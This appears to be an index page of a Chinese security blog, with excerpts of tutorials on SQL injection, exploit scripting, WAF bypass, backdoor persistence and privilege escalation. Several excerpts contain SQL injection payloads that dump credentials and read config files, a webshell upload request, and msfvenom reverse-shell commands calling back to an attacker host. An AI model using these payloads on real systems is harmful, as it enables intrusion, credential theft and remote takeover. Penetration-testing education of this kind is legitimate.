Windows主机漏洞扫描工具 神兵利器

Windows主机漏洞扫描工具

0×00 说明: 这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。 功能: 查找主机上具有的CVE 查找具有公开EXP的CVE 0×01 起因: 因为需要做一些主机漏洞扫描方面的工作,因而编写了这个简单的工具。之前也查找了几款...
最新
阅读全文
NTLMRecon:一款针对Web应用NTLM认证信息的枚举工具 神兵利器

NTLMRecon:一款针对Web应用NTLM认证信息的枚举工具

NTLMRecon NTLMRecon是一款针对Web应用NTLM认证信息的枚举工具,如果目标Web节点启用了NTLM认证功能,那么广大研究人员就可以使用NTLMRecon来枚举目标相关信息。 NTLMRecon是一款运行速度快且扩展灵活的NTLM侦察工具,该工具无需外部依赖即可实现其功能。在处理大量潜在IP地址和域名时,NTLMRecon将能够帮助我们快速收集关于目标NTLM节点的相关信息。 注意:该项目的内部字典取自nyxgeek/lyncsmash库。 工具概览 NTLMRecon可以搜索到启用了NTLM的Web节点,然后向其发送伪造的认证请...
阅读全文
开发简单的PHP混淆器与解混淆器 PHP

开发简单的PHP混淆器与解混淆器

最近(被迫)拿到了不少经过混淆的PHP代码样本,尤其是我使用的某个开源软件里面竟然也有被混淆的PHP代码,导致我不得不把它们都解混淆来检查一下。不过,这些只要20分钟就能写出通用解混淆代码的混淆有什么意义呢? 好想出去玩_(:з」∠)_但出不去,只好在家里应XCTF抗疫赛邀请出题了。但是实在没题出怎么办?恰巧看到Xray的一篇吐槽安全从业人员代码平均开发能力差的文章,考虑到解混淆需要一定的开发能力,不如来用混淆水一题吧…… 顺带一提,本次比赛中,我观赏了一下各个队伍的去混淆脚本,基本上都是正则表达式+黑魔法的写法,根本看不懂…… How? 我相信很多人对写一个...
阅读全文
理解Php对象注入 渗透测试

理解Php对象注入

0x00 背景 原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/ php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识。 0x01 漏洞案例 如果你觉得这是个渣渣洞,那么请看一眼这个列表,一些被审计狗挖到过该漏洞的系统,你可以发现都是一些耳熟能详的玩意(就国外来说) WordPress 3.6.1 Magento 1.9.0.1 Joomla 3....
阅读全文
突破正则匹配:探寻SQL注入绕过WAF的本源之道 渗透测试

突破正则匹配:探寻SQL注入绕过WAF的本源之道

前言:网络上SQL注入绕过WAF的帖子文章纷繁多样,良莠不齐,眉毛胡子一把抓,各种姿势让人眼花缭乱。于是,便有学生问我,SQL注入绕过WAF的最本质原理是什么……. 0X01 WAF介绍 要从本质上回答SQL注入绕过WAF的原理就首先要了解WAF。WAF(Web Application Firewal,网站应用级入侵防御系统)是对Web网站实施安全防护和负载均衡的主要工具,是大小网站标配之一,应用范围极其广泛。WAF从产品形态上来划分,可以大致分为三类:硬件WAF、软件WAF和云WAF。三种WAF的特点和具体例子如图所示:目前,几乎所有的WAF都可以基于规则来识别过滤SQL注入,这是...
阅读全文
权限维持及后门持久化技巧总结 渗透测试

权限维持及后门持久化技巧总结

一、前言 在攻击者利用漏洞获取到某台机器的控制权限之后,会考虑将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透。本文从Windows持久化,Linux持久化和Web持久化对现有技术进行了总结,对于持久化的攻击形式,主要是靠edr、av等终端产品进行检测。 二、Windows后门 2.1辅助功能镜像劫持 为了使电脑更易于使用和访问,Windows 添加了一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。 一些常见的辅助功...
阅读全文
延时注入exp篇写 编程相关

延时注入exp篇写

1、 简介   延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 构造注入延时的语句,当开始到结束的时候肯定是五秒或者大于五秒   2、 延时注入语句   php学习 <?php $time1 = time(); sleep(10); $time2 = ...
阅读全文
盲注入exp篇写 编程相关

盲注入exp篇写

1、 简介   在前几节课中,介绍了 简答的注入exp篇写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 2、 盲注入原理 mysql的盲注入语句 得到表里的帐号和密码的长度 select * from article where id=1 and LENGTH((select GROUP_CONCAT(username,0x3a,password)from&nbs...
阅读全文
批量 getshell exp 编写 编程相关

批量 getshell exp 编写

1、简介   批量exp 有什么用,例如某个大型cms【cms内容管理系统】如dedecms、WordPress、phpcms 突然出了漏洞。各大安全src发布预警信息。 经过安全研究员摸索,poc很快地发布到网上,提供安全人员检测。 网站管理员和运维人员 也开始 处理这次事件。 如果你的企业或任务上很多这样的网站,并不知道是否存在漏洞,总不能每个用手工去测试。 编写批量检测 这样就要提高效率,进行批量测试。 2、php学习 以前编写的exp脚本 都需要命令行运行 exp  如: php.exeexp.php ...
阅读全文
需要验证的exp编写 编程相关

需要验证的exp编写

前四篇的内容都是使用payload 直接访问攻击页面,而且不需要权限认证,能直接使用exp实现攻击。 如果需要登录认证 如 登录后方可访问漏洞页面,像这种需要权限认证的漏洞页面,在平时测试也是非常的多,这节就来细说这种exp如何编写。 访问暗月靶机测试系统 帐号和密码分别为 moon 123456 http://www.moontester.com/ 登录访问->登录后->文章列表   id=1 是存在SQL注入的,以下是测试的payload语句。   -1 unio...
阅读全文
getshell exp编写 编程相关

getshell exp编写

getshell 通常是指通过某种命令或者上传漏洞得到网站的权限或服务器权限,在WEB安全里多为上传漏洞,上传木马(getwebshell) 访问暗月靶机系统,漏洞上传测试。   http://www.moontester.com/upload.php   上传漏洞测试,可以直接上传图片木马,使用burpsuite抓包   POST /upload.php HTTP/1.1 Host: www.moontester.com User-Age...
阅读全文
POST注入exp编写 编程相关

POST注入exp编写

上一篇注入exp的简单编写,这一篇 将会提高难度,写一些复杂的exp。   1、 post注入编写   访问暗月靶机测试系统 登录页面存在报错注入     查询数据的的长度 'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))# 因为 使用 extractvalue函数只能报错3...
阅读全文
简单注入exp编写 python 编程相关

简单注入exp编写 python

python版本 python2.7 停止更新 python3 学的话就要学习python3 python编写exp 注入的exp payload shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin coding:utf-8 设置编码 import 导入模块导入urllib2 re 首先 设置 pydev工具  新建一个python项目 新建exp01....
阅读全文
exp编写篇注入exp的简单编写 编程相关

exp编写篇注入exp的简单编写

1、简介   在https://www.exploit-db.com/ 漏洞库里面每天都可以很多新的漏洞发布。可是新的漏洞很多漏洞发布者 ,都是只给代码漏洞部分,更多的是没有详细的分析。更别说是漏洞利用程序了。   掌握漏洞编写的技能,随心所欲地编写漏洞利用程序,不仅能简化测试过程,而且可以让漏洞程序多种多样满足我们的需要。 一般的们多数接触的是WEB安全漏洞 (Web Application Exploits)这类较多。一般只需理解和掌握http协议即可。 简单的html基础也可以编写EXP了。下面我来为...
阅读全文
Web安全之SQL注入:dnslog无回显注入 渗透测试

Web安全之SQL注入:dnslog无回显注入

1、原理     DNS在解析的时候会留下日志,利用这个属性,可以读取多级域名的解析日志,来获取信息。 将带有查询的语句 发起dns查询请求,通过dns请求查询到值,组合成三级域名,在ns服务器dns的日志中显示出来。 无回显注入 ,一般使用布尔型盲注入和延时注入 查询数据,但是这两种查询都是很慢,dnslog查询 因为是直接显示数据,所以这种注入 效率上面说的这种都要好太多。   最长的字符好似67个   2、平台 http://cey...
阅读全文
WEB安全之SQL注入:报错注入读取文件 渗透测试

WEB安全之SQL注入:报错注入读取文件

上一课 给大家讲解了 mysql报错注入 其实他还有一些用法 例如读取文件 extractvalue读取文件 http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(selectload_file('C:\\inetpub\\wwwroot\\target_sys.com\\data\\config.inc.php')),0x7e))) exp方法读取 http://target_sys.com/mysqlinj.php?id=1 and(exp(...
阅读全文
WEB安全之SQL注入:mysql+php 报错注入 渗透测试

WEB安全之SQL注入:mysql+php 报错注入

mysql在执行 SQL语句的时 如果语句有错 会返回报错信息,在与php结合使用的时候默认并不会把报错的信息在页面显示出来。 如果要在php显示出来 将在执行语句的时候使用mysql_error() 才可以把错误的信息 显示到页面。 $result=mysql_query("select * from article whereid=$id") or die(mysql_error()); 1、判断注入 and 1=1 and 1=2 2、爆库 id=info()将会得到...
阅读全文
提权教程:msf结合漏洞审计工具进行提权 提权教程

提权教程:msf结合漏洞审计工具进行提权

1、 windows 补丁审计工具使用   在终端下可以使用命令systeminfo 来查看系统的一些补丁信息   http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git ...
阅读全文
提权教程:metasploit linux提权 提权教程

提权教程:metasploit linux提权

1、简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 2、使用metasploit linux提权 生成攻击载荷 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw&n...
阅读全文
提权教程:zend反弹shell提权 提权教程

提权教程:zend反弹shell提权

这篇是接着上篇内容所说。 Zend_DLL_Hijacking.exe执行远控 msfconsole 生成反弹shell 生成攻击载荷 msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe 本地监听 use exploit/multi/handler set payload w...
阅读全文